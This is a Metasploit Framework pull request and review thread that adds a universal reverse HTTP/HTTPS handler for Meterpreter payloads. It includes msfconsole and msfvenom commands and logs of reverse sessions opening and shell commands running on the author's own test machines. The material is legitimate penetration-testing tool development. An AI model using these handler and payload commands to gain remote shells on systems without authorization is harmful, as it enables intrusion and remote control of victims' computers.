### PR TITLE
Implement universal HTTP/S handlers for Meterpreter payloads

### PR DESCRIPTION
**Pull request by OJ**
This PR amplifies the hate that any sane person has for individuals who submit way too many code changes in one big hit. I apologise for following on from the previous behemoth with this relatively large chunk of changes.

Unfortunately, when doing this kind of work, it's hard to break it into smaller logical and PR'able chunks that make sense.

## Description

This PR aims to implement the bulk of the changes that support the notion of a "Universal Handler". When I say _Universal_ I don't mean truly universal. The handler still needs to have a payload attached to it, and it needs to be bound to a certain type of transport. A truly universal handler that would work with any payload, on any platform, using any protocol may not actually be possible.

So instead, we have the ability to create a listener bound to a transport (`reverse_http` and `reverse_https` supported), and that can serve up a payload (currently `meterpreter` only, and that probably won't change given the requirements).

I'll let the sample run speak for itself to begin with.

## Sample run
Note that all payloads that are invoked as part of this sample run are created using the typical means (eg: `msfvenom -p windows/meterpreter/reverse_https ...`). There are both staged and stageless payloads used in these examples:
```
msf > use multi/handler
msf exploit(handler) > set payload multi/meterpreter/reverse_https
payload => multi/meterpreter/reverse_https
msf exploit(handler) > set LHOST xx.x.xx.xx
LHOST => xx.x.xx.xx
msf exploit(handler) > set LPORT 7777
LPORT => 7777
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > run -j
[*] Exploit running as background job.

[*] [2016.11.30-14:21:18] Started HTTPS reverse handler on https://xx.x.xx.xx:7777
[*] [2016.11.30-14:21:18] Starting the payload handler...
msf exploit(handler) > jobs -v

Jobs
====

  Id  Name                    Payload                          Payload opts             URIPATH  Start Time                 Handler opts
  --  ----                    -------                          ------------             -------  ----------                 ------------
  0   Exploit: multi/handler  multi/meterpreter/reverse_https  https://xx.x.xx.xx:7777           2016-11-30 14:21:18 +1000  https://xx.x.xx.xx:7777
```
We then fire all the payloads for java, python, windows 32/64 (some on Linux, OSX and Windows):
```
[*] [2016.11.30-14:36:06] https://xx.x.xx.xx:7777 handling request from zz.z.zz.zz; (UUID: r6skewdl) Staging java payload (49941 bytes) ...
[*] Meterpreter session 1 opened (xx.x.xx.xx:7777 -> zz.z.zz.zz:61518) at 2016-11-30 14:36:06 +1000
[*] [2016.11.30-14:36:16] https://xx.x.xx.xx:7777 handling request from zz.z.zz.zz; (UUID: r6skewdl) Staging python payload (38785 bytes) ...
[*] Meterpreter session 2 opened (xx.x.xx.xx:7777 -> zz.z.zz.zz:61550) at 2016-11-30 14:36:17 +1000
[*] [2016.11.30-14:36:22] https://xx.x.xx.xx:7777 handling request from zz.z.zz.zz; (UUID: r6skewdl) Redirecting stageless connection from /QA86632GCJvON9sjlgmb8wJQGGKigesI3EZPXoiyZgVkQv with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] [2016.11.30-14:36:22] https://xx.x.xx.xx:7777 handling request from zz.z.zz.zz; (UUID: r6skewdl) Attaching orphaned/stageless session...
[*] Meterpreter session 3 opened (xx.x.xx.xx:7777 -> zz.z.zz.zz:61577) at 2016-11-30 14:36:22 +1000
[*] [2016.11.30-14:36:37] https://xx.x.xx.xx:7777 handling request from xx.x.xx.xx; (UUID: r6skewdl) Staging java payload (49941 bytes) ...
[*] Meterpreter session 4 opened (xx.x.xx.xx:7777 -> xx.x.xx.xx:42430) at 2016-11-30 14:36:37 +1000
[*] [2016.11.30-14:36:44] https://xx.x.xx.xx:7777 handling request from xx.x.xx.xx; (UUID: r6skewdl) Staging python payload (38761 bytes) ...
[*] Meterpreter session 5 opened (xx.x.xx.xx:7777 -> xx.x.xx.xx:42486) at 2016-11-30 14:36:44 +1000
[*] [2016.11.30-14:36:50] https://xx.x.xx.xx:7777 handling request from xx.x.xx.xx; (UUID: r6skewdl) Redirecting stageless connection from /QA86632GCJvON9sjlgmb8weUqCNvpoMlFP_u258YC8lF6FAc with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] [2016.11.30-14:36:50] https://xx.x.xx.xx:7777 handling request from xx.x.xx.xx; (UUID: r6skewdl) Attaching orphaned/stageless session...
[*] Meterpreter session 6 opened (xx.x.xx.xx:7777 -> xx.x.xx.xx:42542) at 2016-11-30 14:36:50 +1000
[*] [2016.11.30-14:36:55] https://xx.x.xx.xx:7777 handling request from yy.y.yy.yy; (UUID: r6skewdl) Staging x64 payload (1190467 bytes) ...
[*] Meterpreter session 7 opened (xx.x.xx.xx:7777 -> yy.y.yy.yy:52373) at 2016-11-30 14:36:56 +1000
[*] [2016.11.30-14:36:58] https://xx.x.xx.xx:7777 handling request from yy.y.yy.yy; (UUID: r6skewdl) Redirecting stageless connection from /6y_QzvImjTlYkFmSAK4NrQPtzuQi_ERCmP20TJ4IQWnsmvqRHBgep30p1_jc-9rWw1E0r5VvNwEXTuTlXXQMHVj4_ with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] [2016.11.30-14:36:59] https://xx.x.xx.xx:7777 handling request from yy.y.yy.yy; (UUID: r6skewdl) Attaching orphaned/stageless session...
[*] Meterpreter session 8 opened (xx.x.xx.xx:7777 -> yy.y.yy.yy:52376) at 2016-11-30 14:36:59 +1000
[*] [2016.11.30-14:37:01] https://xx.x.xx.xx:7777 handling request from yy.y.yy.yy; (UUID: r6skewdl) Staging x86 payload (959043 bytes) ...
[*] Meterpreter session 9 opened (xx.x.xx.xx:7777 -> yy.y.yy.yy:52378) at 2016-11-30 14:37:02 +1000
[*] [2016.11.30-14:37:05] https://xx.x.xx.xx:7777 handling request from yy.y.yy.yy; (UUID: r6skewdl) Redirecting stageless connection from /1ARVkkXR9SxbqVqoA5cOmghqfXlvJET-mC_Xb6mbAfK6G5KI9XnqGW8nMFIYue0YgK0wLgg2tGSuyEOJP8wo6A9e46x with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] [2016.11.30-14:37:05] https://xx.x.xx.xx:7777 handling request from yy.y.yy.yy; (UUID: r6skewdl) Attaching orphaned/stageless session...
[*] Meterpreter session 10 opened (xx.x.xx.xx:7777 -> yy.y.yy.yy:52381) at 2016-11-30 14:37:05 +1000
[*] [2016.11.30-14:37:08] https://xx.x.xx.xx:7777 handling request from yy.y.yy.yy; (UUID: r6skewdl) Staging python payload (38765 bytes) ...
[*] Meterpreter session 11 opened (xx.x.xx.xx:7777 -> yy.y.yy.yy:52383) at 2016-11-30 14:37:09 +1000
[*] [2016.11.30-14:37:12] https://xx.x.xx.xx:7777 handling request from yy.y.yy.yy; (UUID: r6skewdl) Redirecting stageless connection from /GkDz-QOfMS3Rs8SniY2E-gxgEUWExsGmSoLZwOqE2QRPFs36jO7OVFQoFC4ed1wAaJ2rvOd with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] [2016.11.30-14:37:12] https://xx.x.xx.xx:7777 handling request from yy.y.yy.yy; (UUID: r6skewdl) Attaching orphaned/stageless session...
[*] Meterpreter session 12 opened (xx.x.xx.xx:7777 -> yy.y.yy.yy:52405) at 2016-11-30 14:37:13 +1000

msf exploit(handler) > sessions

Active sessions
===============

  Id  Type                        Information                           Connection
  --  ----                        -----------                           ----------
  1   meterpreter java/osx        oj @ cdecl.local                      xx.x.xx.xx:7777 -> zz.z.zz.zz:61518 (zz.z.zz.zz)
  2   meterpreter python/osx      oj @ cdecl.local                      xx.x.xx.xx:7777 -> zz.z.zz.zz:61550 (zz.z.zz.zz)
  3   meterpreter python/osx      oj @ cdecl.local                      xx.x.xx.xx:7777 -> zz.z.zz.zz:61577 (zz.z.zz.zz)
  4   meterpreter java/linux      oj @ ropchain                         xx.x.xx.xx:7777 -> xx.x.xx.xx:42430 (xx.x.xx.xx)
  5   meterpreter python/linux    oj @ ropchain                         xx.x.xx.xx:7777 -> xx.x.xx.xx:42486 (xx.x.xx.xx)
  6   meterpreter python/linux    oj @ ropchain                         xx.x.xx.xx:7777 -> xx.x.xx.xx:42542 (xx.x.xx.xx)
  7   meterpreter x64/windows     DESKTOP-TF4F7AM\oj @ DESKTOP-TF4F7AM  xx.x.xx.xx:7777 -> yy.y.yy.yy:52373 (yy.y.yy.yy)
  8   meterpreter x64/windows     DESKTOP-TF4F7AM\oj @ DESKTOP-TF4F7AM  xx.x.xx.xx:7777 -> yy.y.yy.yy:52376 (yy.y.yy.yy)
  9   meterpreter x86/windows     DESKTOP-TF4F7AM\oj @ DESKTOP-TF4F7AM  xx.x.xx.xx:7777 -> yy.y.yy.yy:52378 (yy.y.yy.yy)
  10  meterpreter x86/windows     DESKTOP-TF4F7AM\oj @ DESKTOP-TF4F7AM  xx.x.xx.xx:7777 -> yy.y.yy.yy:52381 (yy.y.yy.yy)
  11  meterpreter python/windows  DESKTOP-TF4F7AM\oj @ DESKTOP-TF4F7AM  xx.x.xx.xx:7777 -> yy.y.yy.yy:52383 (yy.y.yy.yy)
  12  meterpreter python/windows  DESKTOP-TF4F7AM\oj @ DESKTOP-TF4F7AM  xx.x.xx.xx:7777 -> yy.y.yy.yy:52405 (yy.y.yy.yy)
```
All sessions have been established correctly. Next, we interact, and put them to sleep to show they still work (will show just a couple):

### Java on OSX
```
msf exploit(handler) > sess 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer    : cdecl.local
OS          : Mac OS X 10.12.1 (x86_64)
Meterpreter : java/osx
meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=501(oj) <redacted>
exit
meterpreter > sleep 3
[*] Telling the target instance to sleep for 3 seconds ...
[+] Target instance has gone to sleep, terminating current session.

[*] zz.z.zz.zz - Meterpreter session 1 closed.  Reason: User exit

[*] [2016.11.30-14:44:52] https://xx.x.xx.xx:7777 handling request from zz.z.zz.zz; (UUID: r6skewdl) Attaching orphaned/stageless session...
[*] Meterpreter session 13 opened (xx.x.xx.xx:7777 -> zz.z.zz.zz:62096) at 2016-11-30 14:44:53 +1000
msf exploit(handler) > sess 13
[*] Starting interaction with 13...

meterpreter > sysinfo
Computer    : cdecl.local
OS          : Mac OS X 10.12.1 (x86_64)
Meterpreter : java/osx
meterpreter > exit
[*] Shutting down Meterpreter...

[*] zz.z.zz.zz - Meterpreter session 13 closed.  Reason: User exit
```
### Windows x64
```
msf exploit(handler) > sess 8
[*] Starting interaction with 8...

meterpreter > sysinfo
Computer        : DESKTOP-TF4F7AM
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-TF4F7AM\oj
meterpreter > sleep 3
[*] Telling the target instance to sleep for 3 seconds ...
[+] Target instance has gone to sleep, terminating current session.

[*] yy.y.yy.yy - Meterpreter session 8 closed.  Reason: User exit

[*] [2016.11.30-14:53:22] https://xx.x.xx.xx:7777 handling request from yy.y.yy.yy; (UUID: r6skewdl) Attaching orphaned/stageless session...
[*] Meterpreter session 14 opened (xx.x.xx.xx:7777 -> yy.y.yy.yy:52377) at 2016-11-30 14:53:22 +1000
msf exploit(handler) > sess 14
[*] Starting interaction with 14...

meterpreter > getuid
Server username: DESKTOP-TF4F7AM\oj
meterpreter > sysinfo
Computer        : DESKTOP-TF4F7AM
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] yy.y.yy.yy - Meterpreter session 14 closed.  Reason: User exit
```
### Windows x86
This shows that migration works and that the UUID is correctly updated
```
msf exploit(handler) > sess 10
[*] Starting interaction with 10...

meterpreter > sysinfo
Computer        : DESKTOP-TF4F7AM
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > uuid
[+] UUID: d404559245d1f52c/x86=1/windows=1/2016-11-30T04:27:31Z
meterpreter > sleep 3
[*] Telling the target instance to sleep for 3 seconds ...
[+] Target instance has gone to sleep, terminating current session.

[*] yy.y.yy.yy - Meterpreter session 10 closed.  Reason: User exit

[*] [2016.11.30-14:54:26] https://xx.x.xx.xx:7777 handling request from yy.y.yy.yy; (UUID: r6skewdl) Attaching orphaned/stageless session...
[*] Meterpreter session 15 opened (xx.x.xx.xx:7777 -> yy.y.yy.yy:52382) at 2016-11-30 14:54:27 +1000
msf exploit(handler) > sess 15
[*] Starting interaction with 15...

meterpreter > uuid
[+] UUID: d404559245d1f52c/x86=1/windows=1/2016-11-30T04:27:31Z
meterpreter > exit
[*] Shutting down Meterpreter...

[*] yy.y.yy.yy - Meterpreter session 15 closed.  Reason: User exit
```
### Python on Linux
```
msf exploit(handler) > sess 6
[*] Starting interaction with 6...

meterpreter > sysinfo
Computer     : ropchain
OS           : Linux 4.8.8-200.fc24.x86_64 #1 SMP Tue Nov 15 19:41:51 UTC 2016
Architecture : x64
Meterpreter  : python/linux
meterpreter > shell
Process 31056 created.
Channel 1 created.
sh: cannot set terminal process group (27508): Inappropriate ioctl for device
sh: no job control in this shell
sh-4.3$ id
uid=1000(oj) gid=1000(oj) groups=1000(oj),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
sh-4.3$ exit
exit
meterpreter > exit
[*] Shutting down Meterpreter...

[*] xx.x.xx.xx - Meterpreter session 6 closed.  Reason: User exit
```

## Things to note

* This PR doesn't include _all_ the platforms that this will have to support. There are `TODO` notes that are located where this is appropriate.
* The aim will be to have all UUIDs pulled from the payloads.json file so as to easily match up with the datastore details that were used during original payload construction. This is yet to be done, and will happen in a future PR.
* This code does make a bunch of a fundamental changes to things, and so keen eyes would be greatly appreciated.
* The new stagers mean that `multi/meterpreter/reverse_http(s)` can be used to generate payloads. This doesn't make sense, and we might need to display a warning to users who attempt to create multi payloads. For now, the payload size that results is zero:
```
$ msfvenom -p multi/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=3333 -f raw
No platform was selected, choosing Msf::Module::Platform::Multi from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 0 bytes
```
* The refactoring of the Android and Java bits was required to make things "fit in" with the way things needed to work to allow for generation of the payloads outside of the `module/` subtree. I'd appreciate a good look at what was done here. It's not immediately clear which bits should go where, and so I guessed a bit!
* Ping @timwr who has awesomely agreed to help make sure that Android works with this stuff because I don't have a dev env set up for this stuff yet. I appreciate the help mate!
* I have mucked with payloads quite a bit, and so existing payloads need to be tested to make sure things continue to work. I have done my own as well :)

I do not expect this build to go green on the first attempt. I will be marking this as delayed until @timwr helps me verify Android.

## Verification
Ugh, this might be painful

### Back compat
- [x] Generate all http/https payloads for Meterpreter and configure them to point at different ports.
- [x] Fire up MSF, and create handlers for each of the above payloads that have matching configuration
- [x] Launch each of the payloads and make sure that each and every session establishes correctly (to make sure I didn't break back compat).
### HTTP
- [x] Generate all http payloads for Meterpreter, and configure them to point at the same `LHOST:LPORT`.
- [x] Fire up MSF, and create a `multi/meterpreter/reverse_http` handler, with the same `LHOST:LPORT`.
- [x] Launch each of the http payloads and validate that they correctly connect to the new payload handler and operate correctly.
### HTTPS
- [x] Generate all http payloads for Meterpreter, and configure them to point at the same `LHOST:LPORT`.
- [x] Fire up MSF, and create a `multi/meterpreter/reverse_http` handler, with the same `LHOST:LPORT`.
- [x] Launch each of the http payloads and validate that they correctly connect to the new payload handler and operate correctly.

## Thanks

Cheers to @bcook-r7 as always for the help along the way, and to @timwr for his help with Java/Android.

### CODE REVIEW

**Comment by 0x42424242** [comment]
Just want to say thanks for your hard work mate, I know this has probably been pretty painful 👍

The community thanks you!

**Comment by OJ** [comment]
Thanks @0x42424242 :) Sing out to the whole Rapid7 crew who are funding this thing as well!

**Comment by OJ** [comment]
I am surprised there are so few test failures! I'll get onto these pronto.

File: lib/msf/core/payload/android/reverse_http.rb [hunk 1]
```diff
@@ -0,0 +1,63 @@
...
+
+  #
+  # Generate the transport-specific configuration
+  #
+  def transport_config(opts={})
+    transport_config_reverse_http(opts)
+  end
+
+  def generate_config(opts={})
+    opts[:uri] ||= generate_uri(opts)
```
Comment (timwr) [inline lib/msf/core/payload/android/reverse_http.rb]: The uri generated here doesn't end up in the final payload when I do `msfvenom -p android/meterpreter/reverse_http LHOST=LHOST LPORT=4444 -o met.apk`
Let me see if I can figure out why.

Comment (OJ) [inline lib/msf/core/payload/android/reverse_http.rb]: That's odd. Does the configuration get generated at all?

Comment (timwr) [inline lib/msf/core/payload/android/reverse_http.rb]: The fix is here: https://github.com/OJ/metasploit-framework/pull/17

Comment (timwr) [inline lib/msf/core/payload/android/reverse_http.rb]: Also minor fix for the LURI option here: https://github.com/OJ/metasploit-framework/pull/19/files

**Comment by timwr** [comment]
Some TODOs and https://github.com/OJ/metasploit-framework/pull/19/files, other than that looks good to me :)
Great stuff @OJ

**Comment by OJ** [comment]
Thanks again for your support/help @timwr !

**Comment by bcook-r7** [comment]
Hmm, trying this out initially:

```
./msfconsole -qx 'use multi/handler; set payload multi/meterpreter/reverse_https; set lhost 192.168.56.1; run -j'
payload => multi/meterpreter/reverse_https
lhost => 192.168.56.1
[-] Exploit failed: An invalid argument was specified. Invalid target index.
```

**Comment by bcook-r7** [comment]
Never mind, it was a brand new bug that I happened upon!

**Comment by OJ** [comment]
Did I break it again? Or is that the result of a merge with master?

**Comment by OJ** [comment]
Anything I can do to help this one @bcook-r7 ?

**Comment by bcook-r7** [comment]
I think we just need to do a bit more testing and this will be good to go. Wanted to hold a bit to get the last pro release out before updating to the next step. Thanks!

**Comment by OJ** [comment]
No probs, thanks Brent!

**Comment by bcook-r7** [comment]
Looking good, let's land this!

**Comment by OJ** [comment]
Hooray! `\o/` thank you Brent!

**Comment by bcook-r7** [comment]
## Release Notes

This adds the first "Universal Handler" which is able to serve Meterpreter payloads dynamically to a a single reverse HTTP or HTTPS listener. This means that one does not have to use LURI or multiple ports in order to run multiple exploits or payloads against the same listener.

**Comment by thecarterb** [comment]
@bcook-r7 would this be implemented in `autopwn` or `autopwn2`?

**Comment by bcook-r7** [comment]
autopwn? could make use of this, yes!

**Comment by OJ** [comment]
Just set up your own listener and disable the listener that comes with autopwn?

**Comment by bcook-r7** [comment]
I don't think there is a DisablePayloadHandler option in autopwn2 because it's not technically an 'exploit' and it doesn't include the requisite mixin directly. I think Still a bit more work is needed both on payloads and BES, but this is a good start.

**Comment by digilevi2006** [comment]
Hi,

I just want to know if what "We then fire all the payloads for java, python, windows 32/64 (some on Linux, OSX and Windows):" means. 

I only tried these steps but doesn't work. can't have sessions

`msf > use multi/handler
msf exploit(handler) > set payload multi/meterpreter/reverse_https
payload => multi/meterpreter/reverse_https
msf exploit(handler) > set LHOST xx.x.xx.xx
LHOST => xx.x.xx.xx
msf exploit(handler) > set LPORT 7777
LPORT => 7777
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > run -j
[*] Exploit running as background job.

[*] [2016.11.30-14:21:18] Started HTTPS reverse handler on https://xx.x.xx.xx:7777
[*] [2016.11.30-14:21:18] Starting the payload handler...
msf exploit(handler) > jobs -v`

**Comment by OJ** [comment]
@digilevi2006 please use Slack or open a new issue if you have questions or problems.

What you'be done above is correct. You now need to generate payloads that can talk to the handler, and invoke them.

**Comment by digilevi2006** [comment]
Hi @OJ ,

Thank you for your kind reply.

Okay, will start a new thread on Issues.

**Pull request merged**